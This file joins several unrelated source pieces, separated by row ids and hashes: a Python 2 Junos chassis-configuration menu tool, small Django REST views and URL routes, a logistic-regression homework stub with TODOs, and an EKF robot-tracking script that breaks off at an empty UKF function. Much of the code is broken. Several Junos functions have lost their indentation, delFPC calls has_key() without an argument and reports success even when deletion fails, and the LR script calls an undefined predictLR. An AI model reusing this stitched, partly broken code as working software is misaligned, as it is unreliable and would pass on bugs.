addFPC(hostname)
# Add FPCs to chassis
getfpc = 'y'
while getfpc is 'y':
getfpc = getYNAnswer("Add another FPC")
if getfpc is 'y':
addFPC(hostname)
# If this is a stackable system
else:
# Set Dictionary Format for stackable
lan_router[hostname].update({ 'chassis_type' : 'stackable' })
lan_router[hostname].update({ 'is_vc' : False })
lan_router[hostname].update({ 'chassis_mod' : model })
# Add Native Ports
if fpc == 0:
lan_router[hostname].update({ 'interfaces' : {} })
lan_router[hostname]['interfaces'].update({ 'physical' : {} })
addNativeInterfaces(hostname, model, False, fpc, 0)
# Add Built-in Modules
addModules(hostname, 'builtin', fpc)
# Add Expansion Modules
print "Enter Expansion..."
if getYNAnswer("Will this system have expansion modules") == 'y':
addModules(hostname, 'expan', fpc)
print "Finished system creation."
# Adding Modules
def addModules(hostname, module_type, fpc=0):
    """Install modules into slot *fpc* of *hostname*.

    module_type -- 'expan' prompts the user (module, then slot) repeatedly
                   until "Go Back"; 'builtin' silently installs every
                   built-in module defined for the model.
    """
    print "\n************************************"
    print "* Add Expansion Modules to Chassis *"
    print "************************************\n"
    # Common Variables
    expan_mod = ""
    expan_slot = ""
    model = ""
    # Determine if this is a virtual chassis module or standalone to reference correct chassis mod
    if lan_router[hostname]['chassis_mod'] == 'Virtual_Chassis':
        model = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
    else:
        model = lan_router[hostname]['chassis_mod']
    # Build Expansion Modules
    if module_type == 'expan':
        # Get Expansion Module
        question1 = "Select Expansion Module"
        opt1 = []
        for module in system_model[model]['expan_mods']:
            opt1.append(module)
        opt1.append("Go Back")
        while True:
            # Loop through possible expansion slots
            for slot in system_model[model]['expan_slots']:
                not_matched = True
                # Loop through keys under FPC
                for pic in lan_router[hostname]['interfaces']['physical'][fpc].keys():
                    # Check if switch has this slot populated
                    if str(slot) == str(pic):
                        #print "Matched!!"
                        not_matched = False
                        if lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] == 'expan':
                            print "PIC Slot " + str(pic) + " currently contains " + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
                        else:
                            print "PIC Slot " + str(pic)
                # This matches if nothing is matched in the for loop
                if not_matched:
                    print "PIC Slot " + str(slot) + " is empty"
            # Ask user to select an expansion model to add
            expan_mod = getOptionAnswer(question1, opt1)
            if expan_mod == "Go Back":
                break
            else:
                # Get Available Slot
                question2 = "Select a slot"
                opt2 = []
                for slot in system_model[model]['expan_slots']:
                    opt2.append(str(slot))
                opt2.append("Go Back")
                while True:
                    # Ask user which slot to put the PIC in
                    expan_slot = getOptionAnswer(question2, opt2)
                    if expan_slot == "Go Back":
                        break
                    else:
                        addModuleInterfaces(hostname, fpc, int(expan_slot), expan_mod)
                        break
    # Build Built-In Modules
    elif module_type == 'builtin':
        opt1 = []
        opt2 = []
        for slot in system_model[model]['builtin_slots']:
            opt1.append(slot)
        for module in system_model[model]['builtin_mods']:
            opt2.append(module)
        # Combine lists into dict
        built_dict = dict(zip(opt1, opt2))
        # Loop over built-in slots/mods
        for builtin_slot, builtin_mod in built_dict.iteritems():
            addModuleInterfaces(hostname, fpc, int(builtin_slot), builtin_mod)
# Add chassis FPCs, includes linecards and routing engines
def addFPC(hostname):
    """Add an SRE or linecard module to modular chassis *hostname*.

    The first module ever added must be an SRE; afterwards any module
    supported by the chassis model may be placed into a free FPC slot.
    """
    #pp.pprint(lan_router)
    # Get hosts chassis model
    chassis_model = lan_router[hostname]['chassis_mod']
    # Create option list
    option = []
    module = ""
    # Create a list of the possible modules
    if not lan_router[hostname]['interfaces']['physical'].keys():
        for module_mod in modular_model.keys():
            if chassis_model in modular_model[module_mod]['supported_chassis'] and "SRE" in module_mod:
                option.append(module_mod)
        option.append("Go Back")
        question = "No SREs detected, you MUST have at least one SRE"
        module = getOptionAnswer(question, option)
    else:
        # Display the chassis members and ask which one to add
        for module_mod in modular_model.keys():
            if chassis_model in modular_model[module_mod]['supported_chassis']:
                option.append(module_mod)
        option.append("Go Back")
        question = "Select module to add"
        module = getOptionAnswer(question, option)
    if module != "Go Back":
        # Possible FPCs
        possFPCs = []
        availFPCs = []
        # Check if this is an SRE or LINECARD
        if "SRE" in module:
            possFPCs = system_model[chassis_model]['sre_slots']
        else:
            possFPCs = system_model[chassis_model]['expan_slots']
        print "possFPCs: " + str(possFPCs)
        # Used FPCs on host
        usedFPCs = lan_router[hostname]['interfaces']['physical'].keys()
        print "usedFPCs: " + str(usedFPCs)
        # Determine available FPC slots
        for fpc in possFPCs:
            if fpc not in usedFPCs:
                availFPCs.append(str(fpc))
        availFPCs.append("Go Back")
        print "AvailFPCs"
        print availFPCs
        # Ask user to select an FPC
        question = "Select an FPC to add this module to"
        fpc_add = getOptionAnswer(question, availFPCs)
        #print "FPC_add: " + fpc_add
        if fpc_add != "Go Back":
            # Add interfaces
            print "Adding interfaces..."
            addChassisInterfaces(hostname, module, int(fpc_add))
# Delete chassis FPCs, includes linecards and routing engines
def delFPC(hostname):
# Display the FPCs in the chassis
if lan_router[hostname]['interfaces']['physical'].has_key():
usedFPCs = lan_router[hostname]['interfaces']['physical'].keys()
question = "Select an FPC to delete"
fpc_delete = getOptionAnswer(question, map(str, usedFPCs))
# Delete the chosen FPC from the lan_router dictionary
try:
del lan_router[hostname]['interfaces']['physical'][int(fpc_delete)]
except Exception as exception:
print "Failed deleting FPC " + fpc_delete
finally:
print "Successfully deleted FPC " + fpc_delete
else:
print "Error: No FPCs to delete"
# Adds interfaces to a chassis-based system
def addChassisInterfaces(hostname, fpc_mod, fpc):
pic = 0
# Get number of ports for this fpc model
port_num = modular_model[fpc_mod]['port_num']
# Build out base of interface heirarchy
lan_router[hostname]['interfaces']['physical'].update({ fpc : {} })
lan_router[hostname]['interfaces']['physical'][fpc].update({ 'fpc_mod' : fpc_mod })
lan_router[hostname]['interfaces']['physical'][fpc].update({ pic : {} })
print "Successfully added " + fpc_mod + " into FPC " + str(fpc) + "..."
# Create ports
for port in range(0, port_num):
lan_router[hostname]['interfaces']['physical'][fpc][pic].update({ port : {} })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'port' : port })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'is_linked' : False })
lan_router[hostname]['interfaces']['physical'][fpc][pic][port].update({ 'is_bundled' : False })
print "Successfully added interfaces...\n"
# Deleteing Modules for Single Chassis
def delModules(hostname, fpc=0):
    """Show which expansion slots of *hostname* are populated and delete
    the module the user selects (or cancel via "Go Back")."""
    model = lan_router[hostname]['chassis_mod']
    filled_mod_list = []
    # Loop through possible expansion slots
    for slot in system_model[model]['expan_slots']:
        not_matched = True
        # Loop through keys under FPC
        for pic in lan_router[hostname]['interfaces']['physical'][fpc].keys():
            # Check if switch has this slot populated
            if str(slot) == str(pic):
                #print "Matched!!"
                not_matched = False
                if lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_type'] == 'expan':
                    print "Slot " + str(pic) + " currently contains " + lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
                    filled_mod_list.append(str(pic))
                else:
                    print "Slot " + str(pic)
        # This matches if nothing is matched in the for loop
        if not_matched:
            print "Slot " + str(slot) + " is empty"
    #
    filled_mod_list.append("Go Back")
    # NOTE(review): filled_mod_list always contains at least "Go Back", so
    # this test is always true -- the "no modules" case is not distinguished.
    if filled_mod_list:
        question = "Select a Module to Delete"
        select_mod = getOptionAnswer(question, filled_mod_list)
        if select_mod == "Go Back":
            print "Delete Cancelled!"
        else:
            del lan_router[hostname]['interfaces']['physical'][fpc][int(select_mod)]
            print "Deleted PIC!"
###################################################
# ========== VIRTUAL CHASSIS FUNCTIONS ========== #
###################################################
# Create initial virtual chassis configuration
def createVC():
# Run the basic system configuration
print "\n**************************"
print "* Create Virtual Chassis *"
print "**************************\n"
host = setSystemCommon()
# Add new chassis to stack
addSystemVirtualChassis(host, nextMember(host))
# Determine the next available member number
def nextMember(hostname):
    """Return the lowest unused member (FPC) number for *hostname*; 0 when
    the host has no interfaces yet.

    NOTE(review): this gap-finding walk assumes the member keys come back
    in ascending order; Python 2 dict key order is arbitrary, so confirm
    the keys here are always created contiguously from 0.
    """
    #top_member = 0
    next_member = 0
    if 'interfaces' in lan_router[hostname]:
        index = 0
        for member in lan_router[hostname]['interfaces']['physical'].keys():
            if index == member:
                index += 1
            else:
                next_member = index
                break
        next_member = index
    return next_member
# Create virtual chassis system
def addSystemVirtualChassis(hostname, fpc=0):
    """Repeatedly prompt for stackable models and add each valid one as
    member *fpc*, *fpc*+1, ... of virtual chassis *hostname* until the
    user picks "Go Back".  Member 0 also initializes the VC dictionary
    layout."""
    chassis_mod = ''
    # Keep looping through this until we are done adding chassis to the stack
    while True:
        options = []
        for model in system_model.keys():
            if system_model[model]['chassis_type'] == 'stackable':
                options.append(model)
        options.append('Go Back')
        chassis_mod = getOptionAnswer("Select a router model to add", options)
        if chassis_mod == "Go Back":
            break
        elif checkStackValid(hostname, chassis_mod):
            # Only do these things during the creation of FPC 0 (first FPC)
            if fpc == 0:
                # Set Dictionary Format for VC
                lan_router[hostname].update({ 'is_vc' : True })
                lan_router[hostname].update({ 'chassis_type' : 'stackable' })
                lan_router[hostname].update({ 'chassis_mod' : 'Virtual_Chassis' })
                # Set Native Ports
                lan_router[hostname].update({ 'interfaces' : {} })
                lan_router[hostname]['interfaces'].update({ 'physical' : {} })
            addNativeInterfaces(hostname, chassis_mod, True, fpc, 0)
            # Add Built-in Modules
            addModules(hostname, 'builtin', fpc)
            if getYNAnswer("Add an expansion modules") == 'y':
                addModules(hostname, 'expan', fpc)
            # Advance to the next member number for the following iteration
            fpc += 1
# Menu for selecting which chassis to delete from a stack
def delSystemChassisMenu(hostname):
# Get the number of chassis in this stack
fpc_num = len(lan_router[hostname]['interfaces']['physical'].keys())
# Check if there are at least 1 chassis
if(fpc_num):
# Create option list
option = []
for key in lan_router[hostname]['interfaces']['physical'].keys():
model = lan_router[hostname]['interfaces']['physical'][key]['chassis_mod']
option.append("Member " + str(key) + " (" + model + ")")
option.append("Go Back")
# Display the chassis members and ask which one to remove
question = "Select chassis to delete"
selection = ""
print "Length: " + str(len(option))
while selection != len(option)-1:
selection = getOptionTRAnswer(question, option)
if selection > 0 and selection < len(option)-1:
delSystemChassis(hostname, selection)
break
# Delete specified chassis from stack
def delSystemChassis(hostname, fpc):
    """Remove member *fpc* from the stack of *hostname*, printing (not
    raising) on failure."""
    try:
        del lan_router[hostname]['interfaces']['physical'][fpc]
    except Exception as exception:
        print type(exception)
        print "Error deleteing FPC " + str(fpc)
# Returns True or False if hostname is already in use
def isUniqueHostname(hostname):
isUnique = True
for host in lan_router.keys():
if host == hostname:
isUnique = False
print "ERROR: This hostname is already used, please create a unique hostname."
return isUnique
# Checks VC stack combinations, be sure its valid
def checkStackValid(hostname, modelAdd):
ex4245_exists = False
ex4300_exists = False
ex4600_exists = False
# Check if interfaces have already been created
if lan_router[hostname].has_key('interfaces'):
fpc_list = lan_router[hostname]['interfaces']['physical']
# Determine what types of devices are in this stack already
for fpc in fpc_list:
model = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
matchEX4245 = re.match( r'^EX4[2,5][0-9]0', model )
matchEX4300 = re.match( r'^EX4300', model )
matchEX4600 = re.match( r'^EX4600', model )
if matchEX4245:
ex4245_exists = True
elif matchEX4300:
ex4300_exists = True
elif matchEX4600:
ex4600_exists = True
# Check conditions to determine if new switch can be added to stack
if re.match( r'^EX4[2,5][0-9]0', modelAdd ):
if ex4300_exists or ex4600_exists:
print "Model " + modelAdd + " and EX4300/EX4600 cannot be in the same stack."
return False
elif re.match( r'^EX4300', modelAdd ):
if ex4245_exists:
print "Model " + modelAdd + " and EX4200/EX4500/EX4550 cannot be in the same stack."
return False
elif ex4600_exists:
print "WARNING: EX4600 must be the RE in a mixed-mode stack if it includes" + modelAdd + "s."
elif re.match( r'^EX4600', modelAdd ):
if ex4245_exists:
print "Model " + modelAdd + " and EX4200/EX4500/EX4550 cannot be in the same stack."
return False
elif ex4300_exists:
print "WARNING: " + modelAdd + " must be the RE in a mixed-mode stack if it includes EX4300s."
return True
#############################################################
# =================== DISPLAY FUNCTIONS =================== #
#############################################################
# Display interfaces
def displayInterfaces(hostname):
    """Print the interface table (model/FPC/PIC/ports/type/speed/PoE/VCP)
    for a LAN chassis, or the link list for a WAN router."""
    # Make sure hostname
    if hostname in lan_router.keys():
        # Option for displaying Virtual Chassis Interfaces
        print "\n" + "=" * 95
        print "Hostname: " + hostname
        if lan_router[hostname]['is_vc']:
            print "System Type: Virtual Chassis"
            for fpc in lan_router[hostname]['interfaces']['physical'].keys():
                print "\n" + "=" * 95
                print "Member: " + str(fpc)
                print "Model\t\t\tFPC\tPIC\tPorts\tType\t\tSpeed\t\tPoE\tVCP"
                print "-" * 95
                printInterfaces(hostname, fpc, True)
        # Option for displaying Standalone Chassis Interfaces
        elif lan_router[hostname]['chassis_type'] == 'stackable':
            for fpc in lan_router[hostname]['interfaces']['physical'].keys():
                model = lan_router[hostname]['chassis_mod']
                print "System Type: " + model
                print "\n" + "=" * 95
                print "Model\t\t\tFPC\tPIC\tPorts\tType\t\tSpeed\t\tPoE\tVCP"
                print "-" * 95
                printInterfaces(hostname, fpc, False)
        # Option for displaying Modular Chassis Intefaces
        else:
            print "System Type: " + lan_router[hostname]['chassis_mod']
            for fpc in lan_router[hostname]['interfaces']['physical'].keys():
                print "\n" + "=" * 95
                print "Slot: " + str(fpc)
                print "Model\t\t\tFPC\tPIC\tPorts\tType\t\tSpeed\t\tPoE\tVCP"
                print "-" * 95
                printInterfaces(hostname, fpc, False)
        print "\n" + "=" * 95
        displayChassisHardware(hostname, "Both")
        print "\n" + "=" * 95
    # Print WAN info
    elif hostname in wan_router.keys():
        print "\n" + "=" * 95
        print "Hostname: " + hostname
        print "System type: wan"
        print "Preferred Egress: " + str(wan_router[hostname]['pref_egress'])
        print "\n" + "=" * 95
        print "Ports"
        print "-" * 95
        for wanintf in wan_router[hostname]['intf_name']:
            print wanintf
        print "\n" + "=" * 95
    # Print error about invalid hostname
    else:
        print "Invalid Host: " + hostname
# Generic interface print function
def printInterfaces(hostname, fpc, is_vc):
    """Print one table row per port group of slot/member *fpc*: the native
    ports first, then any expansion modules (PIC != 0) and any auxiliary
    module on PIC 0.

    NOTE(review): the expansion/aux rows below reuse the `poe` value
    computed for the native ports -- confirm per-module PoE is not needed.
    """
    # This will print out the primary built-in ports for the chassis
    pic = 0
    # A stackable device
    if lan_router[hostname]['chassis_type'] == 'stackable':
        # Virtual Chassis system
        if is_vc:
            model = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
        # Single Chassis system
        else:
            model = lan_router[hostname]['chassis_mod']
        # Common output
        ports = system_model[model]['port_num']
        poe = system_model[model]['poe_capable']
        vcp = system_model[model]['vcp_capable']
        type_list = ''
        speed_list = ''
        type_len = len(system_model[model]['intf_type'])
        speed_len = len(system_model[model]['speed'])
        for intftype in system_model[model]['intf_type']:
            type_list += intftype
            if type_len > 1:
                type_list += "|"
                type_len -= 1
        for speed in system_model[model]['speed']:
            speed_list += speed
            if speed_len > 1:
                speed_list += "|"
                speed_len -= 1
    # A modular device
    else:
        model = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
        ports = modular_model[model]['port_num']
        poe = modular_model[model]['poe_capable']
        vcp = modular_model[model]['vcp_capable']
        type_list = ''
        speed_list = ''
        type_len = len(modular_model[model]['intf_type'])
        speed_len = len(modular_model[model]['speed'])
        for intftype in modular_model[model]['intf_type']:
            type_list += intftype
            if type_len > 1:
                type_list += "|"
                type_len -= 1
        for speed in modular_model[model]['speed']:
            speed_list += speed
            if speed_len > 1:
                speed_list += "|"
                speed_len -= 1
    # Print the line
    print model + str(useTab(model, 3)) + str(fpc) + "\t" + str(pic) + "\t" + str(ports) + "\t" + type_list + str(useTab(type_list, 2)) + speed_list + str(useTab(speed_list, 2)) + str(poe) + "\t" + str(vcp)
    if lan_router[hostname]['chassis_type'] == 'stackable':
        # This will handle displaying any expansion modules
        for pic in lan_router[hostname]['interfaces']['physical'][fpc].keys():
            # Make sure we're getting a PIC key
            if isinstance(pic,int):
                if pic != 0:
                    model = lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
                    # Common Terms
                    ports = modular_model[model]['port_num']
                    vcp = modular_model[model]['vcp_capable']
                    type_list = ''
                    speed_list = ''
                    type_len = len(modular_model[model]['intf_type'])
                    speed_len = len(modular_model[model]['speed'])
                    for intftype in modular_model[model]['intf_type']:
                        type_list += intftype
                        if type_len > 1:
                            type_list += "|"
                            type_len -= 1
                    for speed in modular_model[model]['speed']:
                        speed_list += speed
                        if speed_len > 1:
                            speed_list += "|"
                            speed_len -= 1
                    print model + str(useTab(model, 3)) + str(fpc) + "\t" + str(pic) + "\t" + str(ports) + "\t" + type_list + str(useTab(type_list, 2)) + speed_list + str(useTab(speed_list, 2)) + str(poe) + "\t" + str(vcp)
                # Check if aux exists
                elif pic == 0 and lan_router[hostname]['interfaces']['physical'][fpc][pic]['has_aux']:
                    model = lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_mod']
                    # Common Terms
                    ports = modular_model[model]['port_num']
                    vcp = modular_model[model]['vcp_capable']
                    type_list = ''
                    speed_list = ''
                    type_len = len(modular_model[model]['intf_type'])
                    speed_len = len(modular_model[model]['speed'])
                    for intftype in modular_model[model]['intf_type']:
                        type_list += intftype
                        if type_len > 1:
                            type_list += "|"
                            type_len -= 1
                    for speed in modular_model[model]['speed']:
                        speed_list += speed
                        if speed_len > 1:
                            speed_list += "|"
                            speed_len -= 1
                    print model + str(useTab(model, 3)) + str(fpc) + "\t" + str(pic) + "\t" + str(ports) + "\t" + type_list + str(useTab(type_list, 2)) + speed_list + str(useTab(speed_list, 2)) + str(poe) + "\t" + str(vcp)
# Compute Tabs
def useTab(mystr, menuTab):
tabSpc = 8
useTabs = 0
length = len(mystr)
try:
useTabs = math.ceil(((menuTab * tabSpc) - length) / 8.0)
except:
print "ERROR: Failure computing tabs"
else:
prtTabs = '\t' * int(useTabs)
return prtTabs
# Create Tabs
def myTab(myStr):
    """Pad *myStr* with tab characters so columns line up, assuming 8-column
    tab stops and fields shorter than 24 characters."""
    if len(myStr) < 8:
        return myStr + "\t\t"
    if len(myStr) < 16:
        return myStr + "\t"
    return myStr
# Display basic chassis information
def displayChassisBasic():
    """Print a one-line summary (hostname, type, model, VC flag) for every
    WAN and LAN system, or a placeholder when none exist."""
    # Check if any hosts exist in dictionary
    if lan_router.keys() or wan_router.keys():
        print "\n" + "="*63
        print "Hostname\tSystem Type\tModel\t\tVirtual Chassis"
        print "-"*63
        for hostname in sorted(wan_router.keys()):
            print myTab(hostname) + myTab("wan")
        for hostname in sorted(lan_router.keys()):
            if lan_router[hostname]['chassis_type'] == 'stackable':
                print myTab(hostname) + myTab(lan_router[hostname]['system_type']) + myTab(lan_router[hostname]['chassis_mod']) + str(lan_router[hostname]['is_vc'])
            else:
                # Modular chassis are never virtual chassis
                print myTab(hostname) + myTab(lan_router[hostname]['system_type']) + myTab(lan_router[hostname]['chassis_mod']) + 'False'
    else:
        print "\n--- NO CHASSIS ---\n"
    print "\n" + "="*63
####################################
# ============= MAIN ============= #
####################################
# Main Function
def main():
    """Entry point: greet the user and hand control to the interactive menu."""
    print("\nWelcome to Junos Configuration Creation Tool \n")
    mainMenu()
if __name__ == '__main__':
    main()
991,673 | 091f2e6b3e72e8223877e7c9ce1ff152f7db37e9 | from django.http import JsonResponse
from rest_framework.decorators import api_view, parser_classes
from rest_framework.parsers import JSONParser
from admin.myRNN.models import myRNN
@api_view(['GET'])
@parser_classes([JSONParser])
def ram_price(request):
    """GET endpoint: run the myRNN ram_price routine, then acknowledge.

    The model call is executed for its side effects; its output is not
    returned to the client.
    """
    myRNN().ram_price()
    return JsonResponse({'RNN ram_price': 'Success'})
@api_view(['GET'])
@parser_classes([JSONParser])
def kia_predict(request):
    """GET endpoint: run the myRNN kia_predict routine, then acknowledge.

    Like ram_price, the prediction runs for its side effects only.
    """
    myRNN().kia_predict()
    return JsonResponse({'RNN kia_predict': 'Success'})
def cube_volume(x):
    """Return the volume of a cube with edge length x."""
    return x ** 3
991,675 | bb46b8d86837301eadcceac5a1ee0c8167db8365 | from django.urls import path
from .views import SitesView
urlpatterns = [
    # Route requests under this prefix to SitesView.
    # NOTE(review): Django route strings conventionally omit the leading
    # slash (path('', ...)); confirm '/' is intended here.
    path('/', SitesView.as_view())
]
|
991,676 | cc93a47fd2a3d0d39c1ef2c05bcd70bbf8a56b6f | from numpy import *
from plotBoundary import *
# import your LR training code
# parameters
data = 'ls'  # dataset tag used to pick the csv files below

print('======Training======')
# load data from csv files
# Fix: the original referenced an undefined `name` here (NameError);
# the dataset tag lives in `data`.
train = loadtxt('data/data_' + data + '_train.csv')
X = train[:,0:2]
Y = train[:,2:3]

# Carry out training.
### TODO ###

# Define the predictLR(x) function, which uses trained parameters
### TODO ###

# plot training results
plotDecisionBoundary(X, Y, predictLR, [0.5], title = 'LR Train')

print('======Validation======')
# load data from csv files
validate = loadtxt('data/data_'+data+'_validate.csv')
X = validate[:,0:2]
Y = validate[:,2:3]

# plot validation results
plotDecisionBoundary(X, Y, predictLR, [0.5], title = 'LR Validate')
|
991,677 | 02642d35a5777f1c88583753a413c3531e33ab50 | import math as m
import numpy as np
import pylab
import sympy as sp
from numpy import reshape as rs
from numpy import matrix as mat
from matplotlib.patches import Ellipse
def eigsorted(cov):
    """Return eigenvalues (descending) and matching eigenvectors of a symmetric matrix."""
    eigvals, eigvecs = np.linalg.eigh(cov)
    idx = np.argsort(eigvals)[::-1]
    return eigvals[idx], eigvecs[:, idx]
class robot(object):
    """Planar unicycle-style robot used by the filters below.

    State is (x, y, heading).  The one-step dynamics are built symbolically
    with sympy and evaluated by substitution.  Class attributes hold the
    simulation and noise parameters shared by all filter implementations.
    """
    t0 = 0           # start time of the simulation
    state_dim = 3    # state dimension: (x, y, heading)
    meas_dim = 3     # measurement vector length (heading channel is zeroed)
    # Initial state (origin, heading pi/2) and initial covariance.
    X0 = np.array([[0],[0],[m.pi/2]])
    P0 = np.matrix([[.1,0,0],[0,.1,0],[0,0,.4]])
    h = 1            # integration step size
    tf = 100         # final time
    # G maps process noise into the state; M masks which measurement
    # channels carry noise (third channel masked out).
    G = np.matrix([[h,0,0],[0,h,0],[0,0,h]])
    M = np.matrix([[1,0,0],[0,1,0],[0,0,0]])
    # Process / measurement noise covariances (scaled by 1/h).
    Q = (1.0/h)*np.matrix([[.01,0,0],[0,.01,0],[0,0,0.2]])
    R = (1.0/h)*np.matrix([[.2,0,0],[0,0.2,0],[0,0,0]])
    def kinematics(self,t):
        """Build the symbolic one-step transition F(x) at time t.

        Speed is |sin(t)|; the turn rate is piecewise constant in t.
        Returns (F, x1, x2, x3) where x1..x3 are the state symbols.
        """
        x1, x2, x3 = sp.symbols('x1 x2 x3')
        v = abs(m.sin(t))
        if t<=50:
            w = 0.1
        elif t<=80 and t>50:
            w = 0.2
        elif t>80:
            w = -0.1
        F = sp.Matrix([x1 + v*sp.cos(x3)*self.h, x2 + v*sp.sin(x3)*self.h, x3 + w*self.h])
        return F, x1, x2, x3
    def jacobian(self,X,t):
        """Jacobian of the transition map, evaluated at state X and time t."""
        F, x1, x2, x3 = self.kinematics(t)
        J = F.jacobian([x1,x2,x3])
        return J.subs([(x1,X[0]),(x2,X[1]),(x3,X[2])])
    def state_propagate(self,X0, Q,t):
        """Propagate state X0 one step with process noise sampled from N(0, Q).

        Pass a zero Q to obtain the noiseless (mean) prediction.
        """
        F, x1, x2, x3 = self.kinematics(t)
        w = np.random.multivariate_normal(np.zeros((self.state_dim,)),Q)
        w = mat(w.reshape((self.state_dim,1))).astype(np.float64)
        X = np.reshape(F.subs([(x1,X0[0]),(x2,X0[1]),(x3,X0[2])]) + np.matmul(self.G,w),(self.state_dim,))
        return X
def lin_obs_model():
    """Build the linear observation model h(x) = [x1, x2, 0] symbolically.

    Returns the sympy observation matrix together with the state symbols.
    """
    x1, x2, x3 = sp.symbols('x1 x2 x3')
    observation_model = sp.Matrix([x1, x2, 0])
    return observation_model, x1, x2, x3
def observation(M,X, R):
    """Sample a measurement Y = h(X) + M @ nu with nu ~ N(0, R).

    Pass a zero R to obtain the noiseless predicted measurement.
    """
    hx, x1, x2, x3 = lin_obs_model()
    noise = np.random.multivariate_normal(np.zeros((3,)), R)
    noise = mat(noise.reshape((3, 1))).astype(np.float64)
    measurement = hx.subs([(x1, X[0]), (x2, X[1]), (x3, X[2])]) + np.matmul(M, noise)
    return np.matrix(measurement).astype(np.float64)
def obs_jacobian(X):
    """Evaluate the Jacobian of the observation model at state X."""
    hx, x1, x2, x3 = lin_obs_model()
    jac = hx.jacobian([x1, x2, x3])
    return jac.subs([(x1, X[0]), (x2, X[1]), (x3, X[2])])
def EKF(system, X_prev_est, X_prev_act, P_prev,t):
    """One extended-Kalman-filter step: predict always, update when t%5 == 0.

    Args:
        system: robot instance supplying dynamics, Jacobians and noise models.
        X_prev_est: previous state estimate (length-3).
        X_prev_act: previous simulated ground-truth state.
        P_prev: previous covariance, flattened to length 9.
        t: current time index; a measurement arrives only every 5th step.

    Returns:
        (X_est, X_act, P) with the covariance flattened to length 9.
    """
    #prediction steps
    P_prev = mat(P_prev.reshape((3,3))).astype(np.float64)
    # Noiseless propagation (zero Q) of the estimate gives the prior mean.
    X_prior = system.state_propagate(X_prev_est,np.zeros((system.state_dim,system.state_dim)),t)
    print "X_prior", X_prior
    A = np.matrix(system.jacobian(X_prev_est,t)).astype(np.float64)
    print "A:",A
    P_prior = np.matmul(np.matmul(A,P_prev),A.T) + np.matmul(np.matmul(system.G,system.Q),system.G.T)
    print "P prior:",P_prior#, " Pinv:", P_prior.I
    # Ground truth advances with the real process noise Q.
    X_act = np.reshape(system.state_propagate(X_prev_act,system.Q,t),(system.state_dim,))
    #
    # if t == 5:
    #
    #     vals, vecs = eigsorted(P_prior[0:2,0:2])
    #     theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
    #     ax = pylab.gca()
    #     for sigma in xrange(1, 4):
    #         w, h = 2 * sigma * np.sqrt(vals)
    #         ell = Ellipse(xy=X_prior[0:2],width=w, height=h,angle=theta,fill=None,color='r')
    #         ell.set_facecolor('none')
    #         ax.add_artist(ell)
    #     #ellipse = Ellipse(xy=X_prior[0:2],width=lambda_*2, height=ell_radius_y*2,fill=None,color='r')
    #
    #
    #     pylab.plot(X_prior[0],X_prior[1],'ro',markersize=2,linewidth=1,label='predicted EKF')
    #     pylab.plot(X_act[0],X_act[1],'bo',markersize=2,linewidth=1,label='Actual')
    #     pylab.legend()
    #     pylab.xlabel('x')
    #     pylab.ylabel('y')
    #     pylab.xlim(-7,7)
    #     pylab.ylim(1,8)
    #     #pylab.show()
    #     pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_EKF_t5.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
    if t%5 == 0:
        #update
        Y_act = observation(system.M,X_act, system.R)
        ##print "Yact:",Y_act
        Y_est = observation(system.M,X_prior,np.zeros((system.meas_dim,system.meas_dim)))
        #print "Y est:",Y_est
        H = np.matrix(obs_jacobian(X_prior)).astype(np.float64)
        print "H:",H
        S = np.matmul(np.matmul(H,P_prior),H.T) + system.R
        #since S is singular and only 1 measurement is received
        #K_gain = np.matmul(np.matmul(P_prior,H),S.I)
        K_gain = np.zeros((system.state_dim,system.state_dim))
        # Regularise zero diagonal entries so S is invertible (unmeasured
        # channels would otherwise make S singular).
        if S[1,1] == 0 :
            S[1,1] = 10**(-9)#adding to make it non-singular
        if S[2,2] == 0:
            S[2,2] = 10**(-9)
        #K_gain[0,0] = np.matmul(P_prior[0,:],H[:,0])/S[0,0]
        #K_gain[1,0] = np.matmul(P_prior[1,:],H[:,0])/S[0,0]
        #K_gain[2,0] = np.matmul(P_prior[2,:],H[:,0])/S[0,0]
        print "S:",S.I
        K_gain = np.matmul(np.matmul(P_prior,H.T),S.I)
        print "K:",K_gain
        print "H.TSI", np.matmul(H.T,S.I)
        X_est = np.reshape(X_prior,(3,1)) + np.matmul(K_gain, Y_act - Y_est)
        print "X est:", X_est
        print "Correction:", np.matmul(K_gain, Y_act - Y_est)
        X_est = np.reshape(X_est,(3,))
        print "I -KH",np.eye(3) - np.matmul(K_gain,H)
        P_post = np.matmul(np.eye(3) - np.matmul(K_gain,H), P_prior)
        print "P_post:", P_post
        # if t == 5:
        #
        #     vals, vecs = eigsorted(P_post[0:2,0:2])
        #     theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
        #     ax = pylab.gca()
        #     for sigma in xrange(1, 4):
        #         w, h = 2 * sigma * np.sqrt(vals)
        #         ell = Ellipse(xy=(X_est[0,0],X_est[0,1]),width=w, height=h,angle=theta,fill=None,color='r')
        #         ell.set_facecolor('none')
        #         ax.add_artist(ell)
        #
        #     pylab.plot(X_est[0,0],X_est[0,1],'ro',markersize=2,linewidth=1,label='updated EKF')
        #     pylab.plot(X_act[0],X_act[1],'bo',markersize=2,linewidth=1,label='Actual')
        #     pylab.legend()
        #     pylab.xlabel('x')
        #     pylab.ylabel('y')
        #     pylab.xlim(-7,7)
        #     pylab.ylim(1,8)
        #     #pylab.show()
        #     pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_EKF_t5_updated.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
        return X_est, X_act, P_post.reshape((system.state_dim**2,))
    else:
        return X_prior.reshape((system.state_dim,)), X_act, P_prior.reshape((system.state_dim**2,))
def UKF(system, X_prev_est, X_prev_act, P_prev,t):
